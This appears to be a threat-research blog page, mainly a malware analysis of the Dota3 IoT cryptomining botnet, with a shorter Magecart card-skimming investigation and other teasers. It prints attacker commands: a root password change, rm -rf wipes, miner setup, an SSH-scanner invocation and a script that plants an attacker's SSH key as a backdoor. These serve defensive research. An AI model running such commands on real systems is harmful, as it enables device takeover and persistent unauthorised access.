Threat Research
Stay on top of the latest threat research, information on in-the-wild cyber attacks and cyber operations from Juniper Threat Labs.
Latest Articles
Dota3: Is your Internet of Things device moonlighting?

Dota3: Is your Internet of Things device moonlighting?


Dissecting the evolution of malware gives researchers insights into the knowledge of, and development processes used by, malware authors. Dota3, active in the wild, offers a unique opportunity to examine a strain of malware during what appears to be an intermediate stage between major versions.


A brief history of IoT

Though the term Internet of Things(IoT) was not coined until around 1999, one of the first examples of a device connected to the internet/network was a soda machine at Carnegie Mellon University. It was a simple device to allow the programmers to check if the machine was stocked, prior to them leaving their desks to retrieve a beverage.


For how simple this device was, it was only a matter of time before computers became smaller and designers started incorporating these devices into more items as a matter of convenience. Like many innovations, ease of use, lower costs and convenience take precedence over security. In the last couple of decades, criminals have seized on this to make IoT devices work for their schemes.


Some of the first commercially available IoT devices were baby monitors and “nanny cams”.  The horror stories of “hackers” screaming at children through these devices in the early 2010s caused many parents to completely swear off using devices connected to the internet -- for a period of time. Now, these devices have become so prevalent and accepted that they appear in many homes.  Avast provided statistics that 66% of homes in the United States scanned have at least one IoT device.  


IoT devices are so much more capable that attackers have evolved their tactics from simple acts of vandalism to botnet incorporation, cryptocurrency mining and back-door installs. The processors and memory available on devices is greater than what was required to run Windows 95 or 98 and considerably more than what was used to land Apollo astronauts on the moon.  


Many IoT devices today come with processors that have Graphical Processing Units (GPUs) and/or dedicated cryptography hardware. Not because the IoT devices need them, but because they are simply a standard part of modern CPUs. 

This combination of advanced computational capability and the notoriously lax security of IoT devices makes them a prime target for cybercriminals, especially those that wish to remain undetected.


The Dota malware family


Among the families of malware that target IoT devices is Dota. Juniper Threat Labs monitors a number of devices, in order to keep an eye on the current state of malware, and here Dota quickly makes itself known.  


Juniper Threat Labs’ SSH sensors, for example, consistently see attempts to load malware after an attacker has successfully compromised the root account. The Dota family of malware has used this attack vector in the past and continues to do so. 

While these attacks are problematic for any target, SSH attacks directed at root accounts are a particular concern for IoT devices. This is because many IoT devices are either left with the default configuration or have been hard coded with a username and password that the user can not even change, if the user knew how or wanted to.


Dota, like any actively maintained software, continues to be developed and enhanced by its developers. On December 7,  2019, Juniper Threat Labs detected a small number of attacks from a newer variant of Dota.

The malware authors generously labelled the eponymous file, which gave this malware its name “Dota3”, helping us to distinguish this version from its predecessors. While we did see Dota variants throughout the year, this was the first time Dota3 has been spotted by Juniper Threat Labs. The use of this variant has been steadily climbing since.  


Despite the increase in Dota3 adoption, it has not completely replaced the Dota or Dota2 variants that were previously used. Looking through the scripts provided below, it would appear this version is a work in progress. The attacker has not cleaned up certain code and even included incomplete scripts into the download.


One interesting observation is the vast majority of the malware downloads have been originating from Ireland, with almost 70% of the top five countries being Ireland and dropping off rapidly after that. We do not know if this is a result of the origin of the bot being in Ireland or the majority of infected systems being in Ireland.  



The attackers appear to be using AWS, in many of the malware caches. However,  research thus far has not fully confirmed if these are compromised sites or sites that the attacker has prepositioned. Researching IPs that are not AWS suggested these are compromised sites since DigitalOcean, Deutche Telekom and 1&1 Internet AG service providers all show use as a malware cache. These IPs are generally linked to websites that are not fully developed or maintained.


Dota3 in detail


Dota3 appears to be based on a botnet, attacking weak SSH servers using default credentials or reused passwords. Some of the username/password combinations we have seen are root/Passwort@12, nproc/nproc, root/verso, testftp/testtfptestftp, noda/noda, root/solid, etc. It does not appear bruteforce, as these attacks are a scan across multiple IPs with the same password, suggesting there is a password list that the bot runs against. If the combination fails, we may not see the attacker again for hours or days.


Analysis of the malware IPs used by Dota revealed that both and were used. The primary communications between the malware client and its command and control server were seen occurring through an encrypted SSH tunnel to the .129 address.  


Here is an example communication that made the connection from France with the username root and the password Vextrex. Vextrex is the default root password for a Vextrec router. Let this be a reminder to everyone to change the default passwords on every device!













2.339, 48.858











login attempt [root/Vextrex] succeeded





December 20th 2019, 16:03:10.281

Juniper Threat Labs has observed significant commonality in the commands executed by the Dota3 malware infections. The commands below are a typical example of commands executed by the malware authors when a device is compromised, although, slight variants are known to occur. The commands are clearly scripted, as all commands are run within a tenth of a second from first to last.

cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l

echo \"root:MsZO7UO7bC52\"|chpasswd|bash","message":"CMD: echo \"root:MsZO7UO7bC52\"|chpasswd|bash

echo \"321\" > /var/tmp/.var03522123","message":"CMD: echo \"321\" > /var/tmp/.var03522123

rm -rf /var/tmp/.var03522123","message":"CMD: rm -rf /var/tmp/.var03522123

cat /var/tmp/.var03522123 | head -n 1

cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}

cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}

free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}

free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}

ls -lh $(which ls)

which ls

crontab -l


uname -m

cat /proc/cpuinfo | grep model | grep name | wc -l



uname -a


echo \"root castro\" > /tmp/up.txt

rm -rf /var/tmp/dota*

Once downloaded, the malware unpacks itself into the hidden directory .rsync/


The unpacked file “init” is a script. It does not have the !# header, which is common amongst bash scripts to indicate its purpose as a bash script. This file was designed to kill any previous installs and remove those files from the system.


File “init2” also does not have the !# header. Like init, init2 is designed to kill previous installs and remove them.


The file “initall”, however, does have #! and also specifies the /bin/sh shell in its header. This indicates that it is intended to run as a script and may indicate that “init” and “init2” are intended to be notes or are script fragments that are yet to be finished. As with init and init2, initall is designed to remove any old or previously installed versions of Dota and then initialize the current attacker’s version.



rm -rf /tmp/.FILE

rm -rf /tmp/.FILE*

rm -rf /dev/shm/.FILE*

rm -rf /dev/shm/.FILE

rm -rf /var/tmp/.FILE

rm -rf /var/tmp/.FILE*

rm -rf /tmp/

rm -rf /tmp/nu.*

rm -rf /dev/shm/

rm -rf /dev/shm/nu.*

rm -rf /tmp/.F*

rm -rf /tmp/.x*

rm -rf /tmp/

pkill -9 go> .out

pkill -9 run> .out

pkill -9 tsm> .out

kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`> .out

kill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`> .out

kill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`> .out

killall -9 xmrig

killall -9 ld-linux

kill -9 `ps x|grep xmrig|grep -v grep|awk '{print $1}'`

kill -9 `ps x|grep ld-linux|grep -v grep|awk '{print $1}'`

cat init | bash

sleep 10

cd ~

pwd > dir.dir

dir=$(cat dir.dir)

if [ -d "$dir/.bashtemp" ]; then

        exit 0


        cat init2 | bash


exit 0

The “a/a” is a script that appears to have been hacked together from github page xmrig cryptominer, allowing for performance boosting if the Ryzen CPU is found.



crontab -r

pwd > dir.dir

dir=$(cat dir.dir)

echo "#!/bin/sh

cd $dir

if test -r $dir/; then

pid=\$(cat $dir/

if \$(kill -CHLD \$pid >/dev/null 2>&1)


exit 0



./run &>/dev/null" > upd

sysctl -w vm.nr_hugepages=$(nproc)

for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d);


    echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages";


modprobe msr

if cat /proc/cpuinfo | grep "AMD Ryzen" > /dev/null;


                echo "Detected Ryzen"

                wrmsr -a 0xc0011022 0x510000

                wrmsr -a 0xc001102b 0x1808cc16

                wrmsr -a 0xc0011020 0

                wrmsr -a 0xc0011021 0x40

                echo "MSR register values for Ryzen applied"

elif cat /proc/cpuinfo | grep "Intel" > /dev/null;


                echo "Detected Intel"

                wrmsr -a 0x1a4 6

                echo "MSR register values for Intel applied"


        echo "No supported CPU detected"


chmod u+x upd

chmod 777 *


The file “a/anacron” is a compiled binary with SHAsum: 557642c34d62ad35da80486404e40d808f52452f and is an ELF 32-bit LSB shared object, reporting Intel 80386, version 1 (SYSV), dynamically linked, stripped.


File “cron” is a compiled binary with SHAsum: a7cd1e37de9b2e38d5dbaeac8124006e27d24281 and is an ELF 64-bit LSB shared object, reporting x86-64, version 1 (SYSV), dynamically linked, stripped.


File Init0 is a script for killing cryptominers in a Linux system. A detailed file analysis public report is available from Joe Sandbox.


File “a/run” is a script to detect if the device infected is 32bit or 64 bit and not significant. 


File “a/stop” is a script to kill the cron process and there is nothing significant to show.


File “b/a” is a simple script to change permissions on the newly installed scripts required to run the cryptominer and not worth showing here.


File “b/run” is a script to install a key in the .ssh/authorized_keys file. The key has been redacted for brevity but would allow the attacker SSH access back into the system without use of the passwords.



nohup ./stop>>/dev/null &

sleep 5


<key redacted>

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh


File “b/stop” is a script to kill the processes, most likely to free up processing power for the cryptominer, and does not show anything significant outside of normal bash commands.


File “c/go” is a bash script for the ARM processor and would run on a previously detected script, allowing for multiple threads and cleanup. Nothing of significant IOC is available in this script.

The file “golan” appears to be an incomplete script.




cd $dir

#timeout 15m ./tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168

#sleep 8m && timeout 15m ./tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16

File “c/run” is a script that calls the golan script but has been commented out in favor of the “go” script. This shows the continual improvement of this attack but lacks any cleanup of old code.




PR=$(cat /proc/cpuinfo | grep model | grep name | wc -l)

ARCH=`uname -m`

if [ "$ARCH" == "x86_64" ]; then

        if [ $PR -lt 7 ]; then

                sleep 15


                sleep 3



                let "s %= $RANGE"

                sleep $s

                #nohup ./golan >>/dev/null &

                #sleep 20m && 

                nohup ./go >>/dev/null &


        if [ $PR -gt 7 ]; then

                #sleep 15


                sleep 3

                #nohup ./golan >>/dev/null &



        #nohup ./golan >>/dev/null &

        #sleep 20m && 

        nohup ./go >>/dev/null &


File “c/slow” is a script. This script appears to be unfinished and would most likely be called to slow down the process consumption to prevent detection.



sleep $[ ( $RANDOM % 10 )  + 1 ]s


File “c/watchdog” is a script designed to watch the services and sleep them. For a time, the load on the processor became noticeable but, otherwise, there is nothing significant from the script.


File “c/tsm” is a script. This script is making the attempt to decide if the architecture calls for the correct version of the tsm* binary.  



SCRIPT_PATH=$(dirname $(readlink -f $0))

ARCH=`uname -m`

if [ "$ARCH" == "i686" ]; then

        $SCRIPT_PATH/lib/32/tsm --library-path $SCRIPT_PATH/lib/32/ $SCRIPT_PATH/tsm32 $*

elif [ "$ARCH" == "x86_64" ];   then

        $SCRIPT_PATH/lib/64/tsm --library-path $SCRIPT_PATH/lib/64/ $SCRIPT_PATH/tsm64 $*


if [[ "$ARCH" =~ ^arm ]]; then

        $SCRIPT_PATH/lib/arm/tsm --library-path $SCRIPT_PATH/lib/arm/ $SCRIPT_PATH/tsmv7 $*


File “c/tsm32” is a compiled binary and has not been reported previously on Virustotal. It is an ELF 32-bit LSB executable, reporting Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, missing section headers.


File “c/tsm64” is a compiled binary 64bit version of tsm32 with SHAsum: 28765b048c9afa942d5a21b8d3f395b20c723667. It is An ELF 64-bit LSB executable, reporting x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=a7ebfe59ae9df5cab9314bef58cce08f84afc511, stripped.


File “c/tsmv7” is a compiled binary for the ARM processor version of tsm32 with SHAsum: 9130b75efdfe5a73320feac5f9b800efb05e63c6. It is an ELF 32-bit LSB executable, reporting ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=3c7fbddc7901d960c977e6f205c2079b7e42661c, stripped.


Dota3 makes use of several common libraries. These are located in the c/lib/ folders.

The hashes for “c/lib/32” are as follows:









82c1c28a394bbeb48bbf85cec98f78ef5b6f49c7  tsm


The hashes for “c/lib/64” are as follows:









05bc0b5b8795004d631935fcd6df8a8f64fe46e0  tsm


“tsm” in this folder matches the hash reported for


The hashes for “c/lib/arm” are as follows:









369c4027e9b09131c6971ee963bfd37d41dc251c  tsm




Juniper’s SKY Advanced Threat Prevention Appliance detects the binary as version of Trojan:Linux


The evolution of the Dota malware family continues. While the current version of Dota3 looks unfinished, what we’ve seen so far indicates that it won’t be long before a final version of Dota3 emerges, adding more functionality to this rapidly growing IoT botnet’s capabilities.


Since this version's first sighting in December, it has steadily been climbing. Meanwhile, Dota2 has dropped off in usage, having seen no new Dota2 attacks in the same timeframe. The attackers are clearly improving their code and process.  


We have numerous examples of incomplete code, deprecated code and versions of Dota3 that were uploaded packed, without all the functional code required.  This perhaps shows there is more than one actor and, of those actors, some without the same skill set as those that had originally crafted the malware

GoMiner mutates and spreads via public cloud storage providers

GoMiner mutates and spreads via public cloud storage providers

Juniper Threat Labs discovered a family of Monero Miners that spreads through cloud storage providers such as OneDrive, Google Drive and Dropbox. It also has the ability to mutate or change itself to try to avoid detection.


Juniper Employee
MageCart Skims Credit Cards from

MageCart Skims Credit Cards from



Late in December 2019, someone I know received a notification from their credit card company stating a transaction for a purchase of substantial value was pending. Not recognizing the transaction, the person immediately contacted the credit card company to put a stop to the transaction which had not yet settled. A few minutes later, the card was blocked and a new card was being mailed to the person's home address.


For most people, that’s how the story ends. But being in the cybersecurity industry, I wanted to find out more. Where and when was their credit card data stolen? Were they victim to one of the breaches that took place months ago in major retail stores or credit issuing banks?


I decided to start by tracing their steps back to where they shopped online recently. Most of it was usual but one stood out because they had only made a purchase at that store once in recent times: The site was a popular -- a legitimate brick-and-mortar business that had been around for a long time -- and not in the news about any breach.


To investigate if the site had been compromised, I knew I had to focus on the checkout page. That’s how the infamous Magecart group operates, by injecting a javascript code to submit all credit card details to a command and control server of their own as clients are checking out.


I started by adding an item to my shopping cart and proceeded to check out. At that point, a combination of Chrome’s developer tools and wireshark captures were the only tools I needed to identify any unusual connection that should not be happening. Checkout Checkout Page

Card details submitted to C&C site


Going through the network connections, it didn’t take long to realize that credit card data was being submitted to two different sites, as shown in the screenshots below.


This first one is the legitimate payment card processing site:

Credit Card Details being submitted to FocusCamera.comCredit Card Details being submitted to


The second POST request is the fraudulent one, submitted to a domain named Note the similarity with a legitimate ZenDesk domain named (no "s" between the "d" and the "a").

Credit Card Data Being Submitted to Exfiltration DomainCredit Card Data Being Submitted to Exfiltration Domain


According to registration data provided by, the domain has been registered on November 11, 2019. As of this writing, it would mean the skimming operation under this domain has lasted less than two months. The domain is registered with Hosting Concepts B.V. d/b/a Openprovider, a hosting provider in the Netherlands. The site is hosted on a dedicated server at Vultr Holdings in New Jersey and the IP address is provided by AS-Choopa (ASN AS20473).

Registration of Exfiltration DomainRegistration of Exfiltration Domain




Based on some DNS telemetry we have access to, this C&C domain has been resolved 905 times since it was created, which may be an indication of the number of victims of this card skimming operation. It is possible the same C&C domain is being used across multiple compromised shopping sites and campaigns - At this time, we don’t have any telemetry to prove it one way or the other.


DNS Resolution Cache Misses to Exfiltration DomainDNS Resolution Cache Misses to Exfiltration Domain


Site Compromise

It seems the threat actor has managed to access the source code of the web site and modify a javascript file to inject the malicious payload.


The main checkout script loads a javascript file as shown below:


Original Script Call on checkout pageOriginal Script Call on checkout page

This particular script has been modified by the threat actor to append an obfuscated base64 encoded javascript routine as shown below:


Base64-encoded Skimming Code Appended to Existing ScriptBase64-encoded Skimming Code Appended to Existing Script


When base64 decoded, this script performs the malicious activity:


Decoded Credit Card Skimming ScriptDecoded Credit Card Skimming Script


The process above is for customers who check out as a guest. We have not tested the checkout process for previously registered users to see if their credit cards would also be skimmed.


This attack has all the hallmarks of a Magecart attack, going after the client side skimming of payment card data. This is not any particular hacker group, but rather a consortium of threat actors using similar methods to compromise third party libraries in a supply chain attack, or simply hacking into the target website to implant malicious code. Amongst the well known victims are British Airways, TicketMaster, NewEgg and more.


Responsible Disclosure

As soon as we realized was breached, Juniper Threat Labs immediately reached out to the site owners via an online contact form as well as left voice-mails. Unfortunately, week-ends and a time zone difference caused a couple days of delay in response, but we managed to have a live conversation with the domain admins. We shared all the information we had at the time and held a follow up call later in the day to share additional discoveries, based on our analysis of the site. By the end of the day, the malicious code was removed from the site.




MageCart continues to pose significant risk to online shopping and is expected to be one of the top cyber security stories of 2020. It is possible for site owners to guard against this attack by ensuring the integrity of their site's source code. Indeed, attackers do need to tamper with the site's source code to inject the malicious skimmer javascript, either by exploiting a server's vulnerability or by compromising a third party library. In this particular example, it is clear that some javascript file from was modified from its original deployed version to include the additional injected eval statement. Which simple file hash monitoring, this should trigger an alarm.




Exfil Domain:

Exfil IP:


Juniper Employee
Stalking Stalkerware: A Deep Dive Into FlexiSPY

Stalking Stalkerware: A Deep Dive Into FlexiSPY

In October, the FTC announced it had reached a settlement effectively shutting down Retina-X Studios, maker of MobileSpy, PhoneSheriff and TeenShield. According to the FTC:


Juniper Employee
CVE-2019-3398: Atlassian Confluence Download Attachments Remote Code Execution

CVE-2019-3398: Atlassian Confluence Download Attachments Remote Code Execution

Atlassian Confluence is a collaboration tool that is used by organizations to create and share various documents related to marketing, design specifications, project planning, etc. It can be licensed both as a SaaS (Confluence Cloud), as well as an on-premise enterprise software (Confluence Server).


Juniper Employee
Growing attacks using Accept-Charset exploit

Growing attacks using Accept-Charset exploit

Juniper Threat Labs is seeing a growing attack on Accept-Charset HTTP Header. This request header allows the client to indicate what character sets, i.e., ISO-8859-1 or utf-8,  are available for response. Attackers are trying to exploit this header by passing a base64-encoded PHP code. During the course of our investigation, we have identified the vulnerable software to be a tampered version of phpStudy. At some point in time, hackers were able to hack into phpStudy and tamper on 2016 and 2018 versions of the software to make it vulnerable to this specific exploit.


Juniper Employee
Latest Comments
threatresearch | 10-13-2019
Re: RCE Attacks Targeting Misconfigured Open PHP-FPM
By  vidyasp
threatresearch | 09-28-2018
Re: Kronos - The Banking Chronicle
threatresearch | 05-24-2018
Re: VPNFilter: a nation state campaign for surveillance and destruction
By  omarg